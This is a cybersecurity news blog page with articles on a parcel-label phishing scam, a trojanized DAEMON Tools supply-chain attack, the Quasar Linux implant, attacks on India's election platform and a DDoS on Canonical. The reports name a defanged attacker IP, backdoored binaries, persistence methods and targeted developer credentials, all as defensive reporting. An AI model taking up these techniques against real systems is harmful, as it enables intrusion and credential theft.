Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Latest News

Canadian Privacy Regulators Say OpenAI Violated Federal and Provincial Privacy Laws

  After months of scrutiny, Canadian oversight bodies determined OpenAI did not meet several national and regional data protection standards...

All the recent news you need to know
Shipping Labels Identity Theft
Cyber Fraud Delivery Scam Parcel Security Data Privacy Shipping Labels Identity Theft

Delivery-Label Scam: How Amazon & Flipkart Boxes Can Steal Your Data

 

Scammers are exploiting discarded delivery boxes from Amazon and Flipkart to harvest personal information and launch sophisticated phishing attacks, so shoppers need to treat packaging as sensitive data rather than trash. Labels on parcels often include names, phone numbers, addresses and sometimes order details, which fraudsters collect from bins or common disposal areas and then use to make their outreach appear legitimate. 

The attack begins with a simple, low-tech step: gathering boxes with intact shipping labels. Criminals extract the printed information and then contact the recipient posing as customer-care or rewards agents, leveraging the accurate personal details to build trust quickly. Because the caller or message can reference the victim’s real name, number, and recent purchase, targets are more likely to engage and follow instructions, which typically include clicking a link or sharing an OTP to “confirm” a cashback, refund, or prize. 

Clicking the supplied link or following caller instructions is where the compromise happens. Victims are often led to phishing pages or prompted to install malicious apps that capture credentials, banking details, and OTPs, or to enter payment information directly on fake forms; these steps can lead to immediate financial loss and longer-term account takeover. Scammers sometimes combine this with social-engineering scripts—urgent tones, limited-time offers, or threats of cancelled orders—to pressure victims into acting without verification. 

Safety tips 

Protection is straightforward but requires habit change. Before discarding any parcel, remove or destroy the shipping label—tear it off, shred it, black it out with a permanent marker, or use an identity-protection roller stamp to obscure personal data. Never click links or install apps sent by unknown numbers, and verify any unexpected offers or refund requests directly through the official Amazon or Flipkart apps or websites rather than through messages or calls. Treat unsolicited calls that reference personal order details with skepticism, and never share OTPs, passwords, or bank information even when the caller appears informed. 

This scam becomes especially active around big sale events when large volumes of deliveries increase the supply of labelled packaging and scammers’ opportunities to find usable targets. A few seconds spent removing labels and a little caution with links and calls can block an easy avenue criminals use to convert harmless cardboard into a source of identity theft and financial fraud.
Read more »
Technology
agentic AI AI ChatGPT Cloud GenAI Internet Technology

4 Key Areas in 2026 for Organisation Safety Against Advanced AI Threats

4 Key Areas in 2026 for Organisation Safety Against Advanced AI Threats

2026 has not been a kind year to cybersecurity, as organizations and industries globally have been hit by ruthless cyberattacks. 

2026 and cybersecurity

Cybersecurity entered 2026 under stress to deploy AI tech while building foundations for a quantum future. Cybersecurity experts have to defend against advanced AI and hybrid attacks while facing talent scarcity, a rapidly shifting threat scenario, and rising operational challenges. 

It is the first time that hackers have access to the same advanced enterprise-level tech that security experts are using to defend their digital assets.

Is the convergence good or bad?

Organizations are in need of the transformational advantage that Quantum computing promises, however, it also risks affecting the cryptographic infrastructure that protects today’s digital world. Worse, cyber attackers are getting together and outbeating experts. 

Like experts, threat actors don’t mind playing the long game either, they gain initial access and stay hidden inside systems for longer periods of time. When the right opportunity arrives, they move laterally and hack important data that can affect operations, cause financial damage, and tarnish reputations.

So, what are these four key areas that businesses and users need to address or stay safe from?

1. System and skills problem

As per the ICS2 2025 report, 69% respondents suffered multiple cybersecurity breaches due to skill gaps. This is due to various factors such as budget constraints, misalignment in academia, and high enterprise demand.

2. Bug management shift to active exposure reduction

Hackers use GenAI to advance their attacks, scaling, and escape security experts. This reactive cycle delays response times, and gives just basic protection. What businesses need today is Continuous Threat Exposure Management (CTEM) approach that offers real-time visibility before flaws can be exploited. But the success depends on AI-based risk prioritization.

3. Advanced deepfake protection is the need of the hour

Reliability is the new attack vector. Deepfakes have plagued every digital aspect of human life. Traditional measures fail to address content due to AI, therefore AI-based protection is needed. Adaptive deepfake systems can address identity workflows and respond immediately to threats, flagging malicious activity and capturing attacks with detailed metadata for research and audit work.

4. Post-quantum protection 

Quantum computing is making strides in applicability; if sufficiently advanced, the systems can break public-key cryptographic systems in ransomware attacks such as RSA, where hackers extort millions. Hackers are already using the “harvest now, decrypt later” approach, stealing coded data with no promise of returning it. 

Thus, the National Institute of Standards and Technology (NIST) have advised to adopt post-quantum cryptography (PQC) and tracking quantum-vulnerable assets.

Read more »
Supply Chain Attack
Backdoor Malware Cyber Attacks cybersecurity threat DAEMON Tools information stealer Malware Campaign PowerShell Attack QUIC RAT Software Compromise Supply Chain Attack

Trojanized DAEMON Tools Used to Deploy Persistent Backdoor Malware


 

An innocent routine software update mechanism has been weaponized by attackers in order to distribute malware through official distribution channels, enabling a stealthy global supply-chain compromise. AVB Disc Soft authenticated digital certificates were used to sign trojanized builds as part of the operation that remained undetected for nearly a month. 

By bypassing conventional trust and endpoint security mechanisms, these malicious packages were able to avoid triggering immediate suspicion. Kaspersky discovered that the campaign began on April 8, 2026, and resulted in thousands of infections in over 100 countries before the breach was detected on May 1, 2026. 

Almost all infections were characterized by reconnaissance malware intended to gather system intelligence and establish persistence. However, a comparatively small number of carefully selected victims received advanced second-stage backdoors, suggesting a targeted attack on Russian, Belarusian, and Thai organizations involved in government, science, retail, and manufacturing.

Multiple core components of DAEMON Tools were modified, including DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe, and malicious functionality was embedded in versions 12.5.0.2421 through 12.5.0.2434, ensuring that execution occurs at startup while maintaining the appearance of legitimate software functionality.

According to the forensic analysis, the attackers had embedded their malicious framework within several trusted DAEMON Tools binaries, including the DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe that can be found within the installation directory of the application. Because the compromised binaries were signed by authentic AVB Disc Soft signing certificates, operating systems and endpoint security products perceived the compromised binaries as trustworthy, reducing the probability of immediate detection. 

It has been determined that every time the affected binaries are executed during system startup, the CRT initialization routine initiates hidden backdoor functionality, initiating a dedicated background thread aimed at quietly establishing outbound communication with attacker-controlled infrastructure during system startup. 

Throughout the attack, the malware repeatedly sent HTTP GET requests to a typosquatted domain that closely mimicked the legitimate DAEMON Tools download portal, as a method of mixing malicious traffic with expected software communications. According to WHOIS records, the fraudulent domain was registered on March 27, approximately one week before the supply chain intrusion occurred, indicating deliberate preparation of infrastructure prior to the attack by the campaign's operators. 

Based on an analysis of the command-and-control infrastructure, it appeared that compromised systems were able to receive remotely issued shell commands via cmd.exe and PowerShell, which would allow attackers to download and execute additional payloads dynamically. 

PowerShell's WebClient functionality was utilized to retrieve executable files from an Internet server located at 38.180.107[.]76 before silently executing them from temporary system directories and deleting all traces afterwards. In the course of the investigation, envchk.exe, a .NET-based information collector that researchers determined was intended to perform extensive reconnaissance on infected machines, was identified as one of the primary secondary payloads. 

In the malware's source code, embedded Chinese-language strings suggest that the malware's operators are probably Chinese-speaking, but no official affiliation has yet been established for the threat group. This reconnaissance utility collected a broad range of information regarding the host, including MAC addresses, hostnames, DNS domains, installed software inventories, running process lists, system locale configurations, and other host information. 

Following data collection, the collected data is transmitted back to attacker-controlled infrastructure via structured HTTP POST requests, providing the operators with a detailed profile of the compromised environment before deciding whether to escalate the intrusion. Unsuspecting users were infected when they downloaded and installed trojanized yet legitimately signed installers for DAEMON Tools, which executed malicious code contained within trusted application components without the user knowing it. 

After activation, the implanted payload established persistence mechanisms intended to survive reboots, as well as enabled the installation of a covert backdoor capable of communicating with remote attackers when the system is started. 

The command infrastructure was also capable of dynamically delivering additional malware stages based on the victim’s profile and operational significance. It is generally considered to have functioned as a reconnaissance-oriented information stealer tasked with gathering system identifiers, including hostnames, MAC addresses, running processes, installed applications, and locale configurations, before transmitting the harvested telemetry to the operators for the purpose of assessing the environment and prioritizing victims. 

The first-stage profiling phase of the investigation resulted in an evaluation of selected systems for further compromise. Using a lightweight backdoor that is capable of executing arbitrary commands, downloading files, and running malicious code directly in memory, selected systems were escalated to a second-stage compromise.

The attack on a Russian educational institution was escalated by the attackers by using QUIC RAT, a remote access malware strain capable of supporting a variety of communication protocols, as well as injecting malicious code into legitimate processes so that they could operate stealthily after the compromise. 

Despite utilizing software distributed through official channels, the DAEMON Tools breach remained undetected for nearly a month as a highly coordinated and technically mature supply-chain intrusion. An investigation into DAEMON Tools installations conducted on or after April 8 was advised to conduct extensive threat-hunting operations to monitor for abnormal system behavior and unauthorized network activity related to the compromise period. 

Researchers have avoided formally identifying the threat actor behind the campaign, but linguistic artifacts embedded within its first stage strongly suggest that Chinese-speaking operators were responsible. Following earlier compromises involving eScan, Notepad++, and CPU-Z, the incident also illustrates the rising trend of software supply-chain attacks throughout 2026. In parallel with these campaigns, the increasing importance of trusted software ecosystems becoming high-value attack surfaces for sophisticated threat groups continues to be demonstrated, including Trivy, Checkmarx, and Glassworm, which target software repositories, development packages, and browser extensions. 

The DAEMON Tools compromise proves that modern supply-chain attacks are not limited to niche targets or underground software ecosystems, but are increasingly exploiting widely used consumer and enterprise applications. The attackers developed their attack strategy by leveraging trusted software certificates and official distribution channels in order to disguise malicious activity as legitimate software behavior while quietly gaining access to potentially high-value environments across multiple countries. 

Security researchers have concluded that organizations must evolve beyond traditional trust-based security models and embrace continuous monitoring, behavioral detection, and software integrity validation practices that will enable them to identify malicious activity, even within applications that appear legitimate and have been signed. A contemporary supply-chain intrusion illustrates how a single compromised software update can quickly escalate into a global cyber risk with far-reaching operational and national security consequences.
Read more »
Election Security
Cyber Attacks Digital Infrastructure ECI Election Security

Election Commission Says ECINET Withstood Over 68 Lakh Cyberattack Attempts During Poll Counting

 



The Election Commission of India (ECI) said its digital election infrastructure faced more than 68 lakh malicious online hits on the day votes were counted for the recently concluded Assembly elections, with attempts originating from both domestic and overseas sources. According to election officials, the attacks targeted several online systems operated by the Commission, including the public election results portal, but were contained using existing cybersecurity protections.

Officials stated that despite the unusually high volume of hostile traffic, there was no disruption to counting operations or public access to election-related services.

The attacks were directed at ECINET, the Commission’s integrated election management platform that now combines over 40 separate election applications and digital portals into a unified system. The platform is used to manage multiple election-related functions, including monitoring, reporting, voter services, and administrative coordination.

On counting day, May 4, ECINET reportedly processed an average of nearly 3 crore hits every minute. Across all polling phases conducted on April 9, 23, and 29, the platform recorded a total traffic load of 98.3 crore hits, reflecting the scale at which India’s election infrastructure now operates digitally.

The Commission officially launched ECINET in January 2026 after testing its beta version during the Bihar Assembly elections in November 2025. Since then, the application has crossed 10 crore downloads, indicating rapid adoption among election officials, staff, and users accessing poll-related information and services.

Election authorities said the platform played a major operational role during the elections across five states and Union Territories, along with bypolls conducted during the same period. According to officials, ECINET enabled real-time monitoring of election activities, accelerated reporting processes, and improved administrative coordination between different election units. Authorities also said the centralized system helped increase transparency by reducing delays in communication and data sharing.

Cybersecurity analysts have repeatedly warned that election infrastructure has become an increasingly attractive target for malicious cyber activity because such systems process large amounts of real-time public information under intense public scrutiny. During counting periods, election portals often experience massive spikes in traffic as citizens, media organizations, and political workers continuously refresh result dashboards. Security researchers note that these high-traffic periods can also create opportunities for malicious actors to disguise harmful requests within normal user activity.

While the Election Commission did not disclose the technical nature of the 68 lakh malicious hits, such traffic typically includes automated bot requests, denial-of-service attempts, malicious scanning activity, or repeated unauthorized access attempts aimed at slowing systems or overwhelming servers.

The Commission also introduced a new QR code-based photo identity verification system for counting centres during the election process. On counting day alone, more than 3.2 lakh QR codes were generated through ECINET to regulate entry into counting venues. Officials said the system was introduced to ensure that only authorized personnel could enter restricted areas, reducing the possibility of unauthorized access at highly sensitive counting locations.

According to the Commission, this was the first time the QR-based access system had been deployed across all five states and Union Territories simultaneously. The ECI has now decided to adopt the system as a standard security measure for future Lok Sabha and state Assembly elections.

The increasing dependence on centralized digital infrastructure has pushed election management beyond traditional ballot security into the broader domain of cybersecurity, network resilience, identity verification, and real-time system monitoring. As more election operations move onto integrated digital platforms, experts say continuous monitoring and infrastructure hardening will become essential to maintaining uninterrupted electoral processes at national scale.

Read more »
quasar
chain attacks Cybersecurity Digital Supply Chain Risk Linux malware quasar

Quasar Linux Malware Targets Developers in Stealthy Supply Chain Attack

 

A newly discovered Linux implant called Quasar Linux, or QLNX, is a serious threat because it goes after the people and systems that build software. Instead of behaving like ordinary malware, it is designed to quietly take root in developer and DevOps environments, steal valuable credentials, and open the door to supply-chain attacks. 

QLNX is dangerous because it combines several attack techniques in one package. Trend Micro says it can function as a rootkit, a backdoor, and a credential stealer, while also running filelessly, wiping logs, spoofing process names, and removing its original binary from disk to make investigation harder. It also uses multiple persistence methods, including LD_PRELOAD, systemd, crontab, init.d scripts, XDG autostart, and .bashrc injection, so it can keep coming back even if part of it is removed.

The malware’s main prize is access to developer secrets. Researchers say it targets credentials tied to npm, PyPI, GitHub, AWS, Docker, Kubernetes, Terraform, and other tools that are deeply embedded in modern software delivery pipelines. If attackers get those tokens or keys, they can publish malicious packages, tamper with builds, or move from one system into cloud infrastructure and CI/CD environments.

What makes the threat especially troubling is how stealthy it is. Trend Micro found that QLNX can dynamically compile rootkit and PAM backdoor components on the victim host using gcc, which helps it blend in with normal Linux activity. It also harvests clipboard contents, SSH keys, browser profiles, and authentication data, giving attackers a wide view into how developers work and where their secrets are stored.

The broader issue is that developer machines have become high-value targets in the software supply chain. One compromised workstation can expose publishing pipelines, cloud accounts, and internal codebases, so the impact may spread far beyond the original victim. The safest response is to treat developer endpoints like crown-jewel systems: monitor for unusual persistence, restrict secret storage, rotate tokens quickly, and assume a stolen workstation could become the first step in a wider breach.
Read more »
Infrastructure Security
API Cyber Attacks Cybersecurity Attack DDoS DDOS Attacks Hacker attack Infrastructure Security

Ubuntu DDoS Attack Disrupts Installs Updates and Canonical Infrastructure

 

A wave of traffic overwhelmed systems, briefly halting downloads, patches, and web resources managed by Canonical - the team responsible for Ubuntu Linux. Outages stretched nearly twenty-four hours, blocking access to essential tools during the incident. 

Midway through the disruption, Canonical confirmed issues affecting its online systems, calling them a prolonged international cyber incident. With efforts already underway to bring functions back online, progress reports were expected later via verified sources after conditions improved. 

Not just external sites felt the impact - insights from casual chats on unaffiliated Ubuntu message boards pointed to deeper issues. Failures popped up across several core functions: the security API stumbled, repository access broke, setup tools froze, package upgrades failed. When the outage struck, countless machines could neither pull patches nor start clean installs. The ripple spread wider than first assumed. 

A claim of responsibility emerged afterward, attributed to an entity calling itself The Islamic Cyber Resistance in Iraq 313 Team. Supposed messages circulated on Telegram suggest they relied on a service named Beemed - one that facilitates distributed denial-of-service attacks - to execute the incident. While details remain sparse, the method points toward accessible cyber tools being leveraged for disruptive purposes. Heavy network floods emerge when tools like Beamed hand out DDoS power to anyone willing to pay, masking harm behind so-called "testing" labels. 

Instead of building safeguards, some misuse these setups to drown web systems in endless data streams. With advertised force climbing toward 3.5 terabits each second, one sees how readily extreme digital pressure becomes a purchasable option. A single flood of fake signals can overwhelm digital infrastructure when launched from countless hijacked gadgets online. 

Such an event forces critical systems to choke on excessive demand, blocking normal access. Real people experience delays or complete service failures as their requests get lost in chaos. Machines turned into unwilling helpers generate relentless noise instead of useful responses. Performance drops sharply once capacity limits are breached without warning. Genuine interactions fade under pressure from artificial congestion. 

Most times, hacking groups start by slipping malicious software onto gadgets, sometimes using poor login codes instead of strong ones. From there, machines already taken over get bundled together - forming massive clusters run from far away via command centers online. These hijacked setups often change hands in hidden digital bazaars; launching short outages becomes possible for cheap, while heavier assaults require deeper spending. 

What follows? Buyers pick time-limited chaos or go all-in for longer surges. Surprisingly, more DDoS attacks happen now due to widespread access to self-running malware that exploits weak device protections across countries. While strong networks may resist some threats, major companies still face interruptions since hackers pair huge bot-driven data floods with focused attack plans.  

The Ubuntu event underscores how fragile key open-source tools have become - tools that developers, businesses, and public agencies depend on worldwide. When update servers or security interfaces go offline briefly, ripple effects follow. Patching halts. System rollouts stall. All of this unfolds while digital attacks are already underway.
Read more »
Subscribe to: Posts (Atom)

Featured